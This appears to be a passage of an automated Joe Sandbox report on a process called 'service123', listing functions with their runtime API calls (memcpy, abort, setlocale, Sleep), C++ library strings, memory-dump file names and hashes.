abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction ID: 5e5a989741766f40d47e53a44f8d1a7b904fdf0f488a5f755654bb62fa6a2732
Opcode Fuzzy Hash: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction Fuzzy Hash: B4B01272CD9E398A4B2255FC05100C0F20DAE3B398307D983C45A73E048311F0478452

Function 6CA74AE0 Relevance: 10.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA7B8AE), ref: 6CA74B63
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA7B8AE), ref: 6CA74BA5

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction ID: a14b17f99faac5bdfd5468bf577048e2522b033e927f3854fe7cd5c507093e46
Opcode Fuzzy Hash: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction Fuzzy Hash: 7B61D5B9609705CFC714DF29D19061AFBE0BFA8754F14892DE4998B760E730E884CF62

Function 6CA70970 Relevance: 10.2, APIs: 8, Instructions: 150COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6CA092A3,00000003), ref: 6CA709ED
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6CA092A3,00000003), ref: 6CA70A2C

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction ID: 98a5476e0584b1f4ef78397b3e2773384e15bf944a4b58d8ddd6237cee7b26da
Opcode Fuzzy Hash: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction Fuzzy Hash: 3061E3B8509746CFC714DF19C09051AFBE0BFA9754F14891EE8E98B761D731E884CB52

Function 6CA72B90 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,6CA6736E), ref: 6CA72C03

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6CA72D14, 6CA72D71, 6CA72DD6
basic_string::_M_create, xrefs: 6CA72C1A, 6CA72CBA
basic_string::basic_string, xrefs: 6CA72D0C, 6CA72D69
string::string, xrefs: 6CA72DCE

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 3510742995-126128797
Opcode ID: 14b384d35431795719578d49d8870d699498e6b3ddaefffe599127acac26ce7d
Instruction ID: c04b5b5fc5a4ea887767fc314bcc9dd3083c9991ba5f7c260b3ec3f09ea022dd
Opcode Fuzzy Hash: 14b384d35431795719578d49d8870d699498e6b3ddaefffe599127acac26ce7d
Instruction Fuzzy Hash: E77182B69093508FC310DF2DD58064AFBE4BF99218F59CA9EE4889B316D331C885CB92

Function 6C9DEB70 Relevance: 9.2, APIs: 6, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction ID: 776b5cb8d606380a66f2606d9606c193756eb2173f5fca0a39aad834d3b5289f
Opcode Fuzzy Hash: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction Fuzzy Hash: 2E61B271609B048FC710CF69C48065AF7E5AF98308F46CE1DE898ABB54D730E946CB96

Function 6C9EB060 Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C9EAF3F), ref: 6CAA5FF0
abort.MSVCRT(?,?,?,?,?,?,6C9EAE9C,?,?,?,?,?,?,6CAA6040), ref: 6CAA5FF8
abort.MSVCRT(?,?,?,?,?,?,6C9EAE9C,?,?,?,?,?,?,6CAA6040), ref: 6CAA6000
abort.MSVCRT(?,?,?,?,?,?,6C9EAE9C,?,?,?,?,?,?,6CAA6040), ref: 6CAA6008

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 60c7c129745339f325f33419b8ce9d4a67f85c6e5c0f9b1c5165813f66d03741
Instruction ID: a57929888c0afa674e9ff1518799d982d1c4926213e6b7cf8c8a63ad0e907871
Opcode Fuzzy Hash: 60c7c129745339f325f33419b8ce9d4a67f85c6e5c0f9b1c5165813f66d03741
Instruction Fuzzy Hash: 364106B16053158BCB00AFB9C4812EAB7F1AFA631CF15886DD4848BB15D736D48ECB95

Function 6C9D1020 Relevance: 9.1, APIs: 6, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,6C9D1281,?,?,?,?,?,?,6C9D13AE), ref: 6C9D1057
_amsg_exit.MSVCRT ref: 6C9D1086

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: 97507e3e6c215c3f50cf79280d97cc549c78cb2d88b15ae0d070236ea1605556
Instruction ID: 80dfcac99afe21f0a6be5cc989c173fe9e401e8672d0a750f39f744753b42611
Opcode Fuzzy Hash: 97507e3e6c215c3f50cf79280d97cc549c78cb2d88b15ae0d070236ea1605556
Instruction Fuzzy Hash: F031D072309742CBDB00AF69D58075A77F4EF473A4F12C429D464DBA40DB35E586CB92

Function 6C9F1F00 Relevance: 9.0, APIs: 6, Instructions: 50stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C9F1F18
strlen.MSVCRT ref: 6C9F1F22
memcpy.MSVCRT ref: 6C9F1F3F
setlocale.MSVCRT ref: 6C9F1F52
wcsftime.MSVCRT ref: 6C9F1F76
setlocale.MSVCRT ref: 6C9F1F88

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlenwcsftime
String ID:
API String ID: 3412479102-0
Opcode ID: 424b18269c9568b601aa084ce7b792cc48ee0dbfdd54ac89f4617c58107e666f
Instruction ID: 08b5c170bb751cd8e37aceccb99a86e244f11c74e72e6fa0617692d4a70584be
Opcode Fuzzy Hash: 424b18269c9568b601aa084ce7b792cc48ee0dbfdd54ac89f4617c58107e666f
Instruction Fuzzy Hash: BE11D3B0A09310AFC740AF69C18469EFBE4BFA8754F428C2DE4C887710E778D845CB92

Function 6C9F1C50 Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C9F1C68
strlen.MSVCRT ref: 6C9F1C72
memcpy.MSVCRT ref: 6C9F1C8F
setlocale.MSVCRT ref: 6C9F1CA2
strftime.MSVCRT ref: 6C9F1CC6
setlocale.MSVCRT ref: 6C9F1CD8

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrftimestrlen
String ID:
API String ID: 1843691881-0
Opcode ID: 6c6be702ecd5bb5de11d644345ab9c433beb98d3ffe32bd8be6ea1cefaf23c18
Instruction ID: de06a33880e9e60690e5cb7bb53948c8cc55ec289b9e90e20b9dfa08d7d97979
Opcode Fuzzy Hash: 6c6be702ecd5bb5de11d644345ab9c433beb98d3ffe32bd8be6ea1cefaf23c18
Instruction Fuzzy Hash: 9611D6B0509310AFC741AF68C18479EFBE4BFA8644F428C2DE8C887701E775D844CB92

Function 6C9DED31 Relevance: 9.0, APIs: 6, Instructions: 19COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction ID: 1a388819ac28badcfbdb769e0531fde82d64e59a1d66da7ceeb95ceac9a98d22
Opcode Fuzzy Hash: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction Fuzzy Hash: CAB09272C88D6485CA2055FC00103D6F20D9B27388F02490AC25673D088612F0838546

Function 6C9EE0D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 6C9EE117
LocalFree.KERNEL32 ref: 6C9EE14B

Strings

Unknown error code, xrefs: 6C9EE18C
basic_string: construction from null is not valid, xrefs: 6C9EE1A7

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: Unknown error code$basic_string: construction from null is not valid
API String ID: 1427518018-3299438129
Opcode ID: e19aa1f61c70900b50b535372de8ee38023c98251ab7f349e8501bc013f33a2b
Instruction ID: 1d0fa5165dc8ffb1366c666768edf2fff76a7ac629f534d29e5271c467c5d59a
Opcode Fuzzy Hash: e19aa1f61c70900b50b535372de8ee38023c98251ab7f349e8501bc013f33a2b
Instruction Fuzzy Hash: 33417CB29057059FC700AFA8D5856AEFBF4FF99314F41882CE4849BB10D7749589CB92

Function 00792F89 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00792E97
fputc.MSVCRT ref: 00792F07
memset.MSVCRT ref: 00792FC2

Strings

0, xrefs: 00792FB7
o, xrefs: 00792FCA

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction ID: e4ac3223d2cc9d8b45739130575aec4c55ad96825f49467ffa7dcb28c8a777fd
Opcode Fuzzy Hash: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction Fuzzy Hash: 7B316C71A04205DBCF10EF68D0C87AABBF1BF58310F148519D985AB352E738A902CB90

Function 6C9E3659 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C9E3567
fputc.MSVCRT ref: 6C9E35D7
memset.MSVCRT ref: 6C9E3692

Strings

o, xrefs: 6C9E369A
0, xrefs: 6C9E3687

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction ID: 16eea337f2f9cf86b9275119d9cfc8499aebc97f9bf79eda6b067c5a95f0f7d9
Opcode Fuzzy Hash: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction Fuzzy Hash: 99316BB1A083158FCB02CF79C0807AAB7F5BF6C314F158629D999ABB61E734E800CB50

Function 6C9D9490 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 375stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 6C9D94C2
strlen.MSVCRT ref: 6C9D9616

Strings

_GLOBAL_, xrefs: 6C9D94B7

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: strlenstrncmp
String ID: _GLOBAL_
API String ID: 1310274236-770460502
Opcode ID: 72dc9333098bef3f2f92da4aeeab8e2f62cfa758cb7d005c213c8b60ad29438f
Instruction ID: 7c525f333a6397bb31b1511cf808c883e10355f5ec9db428a6822371a7715f2d
Opcode Fuzzy Hash: 72dc9333098bef3f2f92da4aeeab8e2f62cfa758cb7d005c213c8b60ad29438f
Instruction Fuzzy Hash: 46F171709056288FEB10DF25C8A03DDBBF5AF46308F1681EAC449BB645DB75EA85CF81

Function 6CA4DAB0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 229COMMON

Download Yara Rule

APIs

Part of subcall function 6CA6F8C0: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA4DA2E), ref: 6CA6F95D
Part of subcall function 6CA6F8C0: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA4DA2E), ref: 6CA6F988

memcpy.MSVCRT ref: 6CA4DCB5

Part of subcall function 6CA72530: memcpy.MSVCRT(?,-00000001,?,6C9F749E,?,?,?,?,?,?,?,?,?,?,?,6C9F8E25), ref: 6CA7256C

Strings

Unknown error, xrefs: 6CA4DB08
iostream error, xrefs: 6CA4DD08
basic_string::append, xrefs: 6CA4DDB2, 6CA4DDBE

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: Unknown error$basic_string::append$iostream error
API String ID: 1283327689-1474074352
Opcode ID: 9c395cbf3ef5000860e9424756cbacae6cacf70b9c6b23b6d2e6c2abcfba70da
Instruction ID: 40241560c4a1d2962016001ffa6539a3806df3c5087137955cbe8a050f0341e7
Opcode Fuzzy Hash: 9c395cbf3ef5000860e9424756cbacae6cacf70b9c6b23b6d2e6c2abcfba70da
Instruction Fuzzy Hash: 67A1E2B1D05318CBCB10DFA9C58469DBBF5BF48314F24892ED494ABB51E770A889CF82

Function 6CA3BF60 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 216COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6CA3C03F
memcpy.MSVCRT ref: 6CA3C099
memcpy.MSVCRT ref: 6CA3C127

Part of subcall function 6CA3C500: memcpy.MSVCRT ref: 6CA3C58C

Strings

basic_string::replace, xrefs: 6CA3C194, 6CA3C1A7
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6CA3C1B3

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: 28364e47062dcaa09c2908592e7757cdae1240111706d64cbe51a08dd6fdcdba
Instruction ID: ad1679540fc191534534a720a7091c6b6842163f033fda68fbf24563ad441140
Opcode Fuzzy Hash: 28364e47062dcaa09c2908592e7757cdae1240111706d64cbe51a08dd6fdcdba
Instruction Fuzzy Hash: AF815871A056259FCB00EF6CC99059EBBE1FF89708F158A2DE888C7710E730D984CB92

Function 6CA45000 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6CA450D0
memcpy.MSVCRT ref: 6CA45124
memcpy.MSVCRT ref: 6CA451B8

Part of subcall function 6CA45590: memcpy.MSVCRT ref: 6CA45620

Strings

basic_string::replace, xrefs: 6CA45229, 6CA4523C
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6CA45248

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

